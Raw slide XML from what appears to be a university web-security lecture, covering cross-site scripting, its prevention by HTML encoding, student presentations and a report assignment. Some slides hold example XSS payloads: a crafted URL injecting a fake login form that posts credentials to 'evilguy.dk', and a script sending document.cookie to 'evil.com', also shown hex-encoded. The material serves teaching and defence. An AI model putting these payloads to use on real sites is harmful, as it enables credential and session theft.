              <a:t>…. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>…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recommend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Acunetix.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> for ….</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Tekstfelt 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755576" y="5085184"/>
            <a:ext cx="8244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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1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testasp.vulnweb.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1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Search.asp?tfSearch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK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=%3Cbr%3E%3Cbr%3EPlease+login+before+proceeding:%3Cform+action=%22http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1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evilguy.dk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK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/log.php%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin:%3C/td%3E%3Ctd%3E%3Cinput+type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1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text+length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK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=20+name=login%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput+type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1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text+length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK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=20+name=pw%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3Cinput+type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1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submit+value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK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=LOGIN%3E%3C/form%3E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193816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Users may be suspicious of the link?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/>
              <a:t>atacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>often</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>entire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> to HEX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755576" y="4293096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>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%65%76%69%6c%2e%63%6f%6d%2f%73%74%65%61%6c%3f%63%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/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899592" y="2780928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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>='http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>steal?c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rektangel 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="3717032"/>
            <a:ext cx="390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latin typeface="Wingdings"/>
                <a:ea typeface="Wingdings"/>
                <a:cs typeface="Wingdings"/>
              </a:rPr>
              <a:t>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94059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do to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> it?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3926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do to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> it?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HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>unsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>provided</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> data!!!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  <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean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2636912"/>
            <a:ext cx="1872208" cy="176266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kstfelt 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611560" y="3933056"/>
            <a:ext cx="420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Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert('XSS')&lt;/script&gt;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611560" y="5003884"/>
            <a:ext cx="808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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>lt;script&amp;gt;alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(&amp;#x27;XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&amp;#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>x27;)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>x2F;script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&amp;gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rektangel 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="4499828"/>
            <a:ext cx="390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latin typeface="Wingdings"/>
                <a:ea typeface="Wingdings"/>
                <a:cs typeface="Wingdings"/>
              </a:rPr>
              <a:t>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9067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Is HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>enough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2654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Is HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>enough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Yes – IF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r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>userprovided</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>inside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> standard html </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> tags </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>div</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>&gt;, &lt;p&gt;, &lt;li&gt; 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is-IS" dirty="0" smtClean="0"/>
              <a:t>BUT – many potential pitfalls exists!!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="is-IS" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="is-IS" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="is-IS" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="is-IS" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>Best practise XSS prevention rules from OWASP:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" dirty="0" err="1"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" dirty="0" err="1"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" dirty="0"/>
              <a:t>/XSS_(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" dirty="0" err="1"/>
              <a:t>Cross_Site_Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" dirty="0" smtClean="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Prevention_Cheat_Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="is-IS" dirty="0" smtClean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93" y="3645024"/>
            <a:ext cx="5305955" cy="1371961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266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Student Presentation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Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> – by Martin Stæhr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51" y="2636912"/>
            <a:ext cx="7001133" cy="3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7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Student </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>presentation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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> 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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>by Mikael </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>Kristensen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>Søren Jakobsen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345780"/>
            <a:ext cx="8458200" cy="2603500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323528" y="5867980"/>
            <a:ext cx="233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xkcd.com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/327/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168316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Student Presentation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Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> – by Thomas Jonstrup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068960"/>
            <a:ext cx="5715000" cy="20955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001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Student </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>presentation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WebGoat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 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>Jakob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>Gaard Andersen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3248744"/>
            <a:ext cx="32131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22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Mandatory 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>- First individual mandatory assignment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800" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>Discuss the different topics and subjects covered in this course and how you can use them in the future.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:endParaRPr lang="en-GB" sz="600" dirty="0" smtClean="0">
              <a:latin typeface="Helvetica"/>
              <a:cs typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>Write a 3-4 page report with your personal reflections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:endParaRPr lang="en-GB" sz="600" dirty="0" smtClean="0">
              <a:latin typeface="Helvetica"/>
              <a:cs typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>The report need to have the following 8 paragraphs (subjects from lectures):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="393700" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>- Risk perception and Social Engineering	- Firewalls and IDS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>- Vulnerability scanning			- Onion Routing</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>- Wireless security			- Access control and GPO</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>- SQL injection				- XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="8">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="600" dirty="0" smtClean="0">
              <a:latin typeface="Helvetica"/>
              <a:cs typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>You can discuss the subjects in groups, but each student must write and hand in their own report.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:endParaRPr lang="en-GB" sz="600" dirty="0" smtClean="0">
              <a:latin typeface="Helvetica"/>
              <a:cs typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>Upload your report (.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t> file) on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>Fronter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t> the next Security class.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="393700" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>(no later than Monday 14th @ 08.30)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:endParaRPr lang="en-GB" sz="600" dirty="0" smtClean="0">
              <a:latin typeface="Helvetica"/>
              <a:cs typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
              </a:rPr>
              <a:t>The report need to be approved in order to be enrolled for the exam.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1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2814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noProof="0" dirty="0" smtClean="0"/>
              <a:t>Till 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33880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noProof="0" dirty="0" smtClean="0"/>
              <a:t>Info / literature / links on Fronter – keep updated!!!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noProof="0" dirty="0" smtClean="0"/>
              <a:t>Reading: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sz="1900" dirty="0"/>
              <a:t>10 common mobile security problems to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t>attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="667829" lvl="2" indent="0" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" err="1"/>
              <a:t>www.pcworld.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>/article/2010278/10-common-mobile-security-problems-to-attack.html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sz="1900" dirty="0" smtClean="0"/>
              <a:t>Guidelines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>for Managing and Securing Mobile Devices </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t>in the Enterprise</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="667829" lvl="2" indent="0" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" err="1"/>
              <a:t>nvlpubs.nist.gov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" err="1"/>
              <a:t>nistpubs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" err="1"/>
              <a:t>SpecialPublications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>/NIST.SP.800-124r1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t>pdf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da-DK" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Digital </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>Dectectives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1900" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="667829" lvl="2" indent="0" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" sz="1900" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
